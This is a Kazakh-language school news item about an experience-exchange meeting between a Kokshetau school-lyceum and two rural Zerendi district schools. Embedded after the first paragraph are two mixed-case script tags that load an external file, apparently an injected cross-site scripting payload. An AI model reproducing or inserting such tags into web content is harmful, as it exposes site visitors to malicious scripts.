2024 жылғы 11 желтоқсан күні «Қала мектептерінің ауыл мектептеріне қамқорлығы» жобасын іске асыру мақсатында Көкшетау қаласы Сәкен Жүнісов атындағы №18 мектеп-лицейінде «Ақмола облысы білім басқармасының Зеренді ауданы бойынша білім бөлімі Дөңгілағаш ауылының негізгі орта мектебі» КММ-сі және «Ақмола облысы білім басқармасының Зеренді ауданы бойынша білім бөлімі Жолдыбай ауылының негізгі орта мектебі» КММ арасында «Заманауи мектеп: идеялар мен тәжірибе» атты тәжірибе алмасу мақсатында кездесу ұйымдастырылды.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.12.2024


Кездесу барысында №18 мектеп-лицейі директоры оқу жүйесімен таныстырып, 11 сыныпта және 7 сыныпта қазақ әдебиеті пәнінен, 6 сыныпта жаратылыстану пәнінен, 2 және 3 сыныптарда әдебиеттік оқу пәнінен тәжірибе алмасу сабақтары өтті. «Lesson Study» зерттеу сабағын ұйымдастыру бойынша кеңес беріліп, оқу ісі меңгерушілері мектепішілік бақылау жоспарын тиімді құру және жүзеге асыру бойынша, тәрбие үрдісіндегі «Бір тұтас тәрбие» бағдарламасын жүзеге асыру бағытында кеңестер берілді.
Аталмыш жобаны жүзеге асыруға бағытталған жұмыс әрі қарай жалғастырылу жоспарланды.

Просмотров: 760

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу